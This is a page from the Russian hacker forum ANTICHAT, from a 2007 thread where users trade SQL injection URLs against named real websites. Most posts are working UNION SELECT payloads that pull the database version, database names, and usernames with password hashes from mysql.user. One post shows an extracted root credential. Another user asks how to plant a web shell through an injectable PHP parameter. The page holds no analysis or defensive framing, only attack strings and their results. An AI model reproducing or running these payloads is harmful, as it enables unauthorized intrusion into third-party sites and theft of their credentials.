ANTICHAT - SQL Инъекции

вот так повкуснее будет

http://kahani.com/current.php?id=-6+union+select+1,convert(concat(user,char(58),pass word)+using+latin1),3,4,5,6+from+mysql.user/*

root:1386b54e67928d79

BlackCats

14.03.2007 02:01

http://www.themarchives.com/showproject.php?ID=-5+union+select+1,convert(version()+using+latin1),3 ,4,5/*

XTErner

14.03.2007 02:11

Код:

http://www.aiap.it/news.php?ID=-864%20UNION%20SELECT%201,database(),3,4,5,6,7,8/*

Код:

http://www.top-ix.org/standard.php?id=-59%20UNION%20SELECT%201,2,3,4,5,user,7+from+mysql.user/*

Код:

http://www.buhgalteria.com.ua/Hit.html?id=-1+union+select+1,2,3,4,5,6,7,convert(password%20using%20cp1251)%20+from+mysql.user/*

}{0TT@БЬ)Ч

14.03.2007 02:51

Код:

http://www.joshuaproject.net/scalelist.php?scalevalue=-1.2+union+select+null,version(),null,null,null,null,null,null,null,null,null,null,null/*

Thanat0z

14.03.2007 03:26

15 колонок, Mysql3:

Код:

__http://www.kennisalliantie.nl/index.php?id=3+group+by+16/*

BlackCats

14.03.2007 11:25

http://www.sabeel.org/etemplate.php?id=-13+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 ,13

BlackCats

14.03.2007 12:07

Цитата:

Сообщение от fersa

Нашёл уязвимость:

Код:

http://localhost/index.php?f=1&s=1'

Как можно шелик влить =)
При нажатии на сцылку выдаёт ошибку следующего рода:

Код:

Parse error: parse error, unexpected T_CONSTANT_ENCAPSED_STRING, expecting ']' in с:\appserv\www\index.php(497) : runtime-created function on line 1



Warning: usort() [function.usort]: Invalid comparison function. in c:\appserv\www\index.php on line 497

Цитата:

http://www.brodyweiser.com/aboutus_detail.php?id=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13/*

Время: 06:11

Страница 101 из 1604

101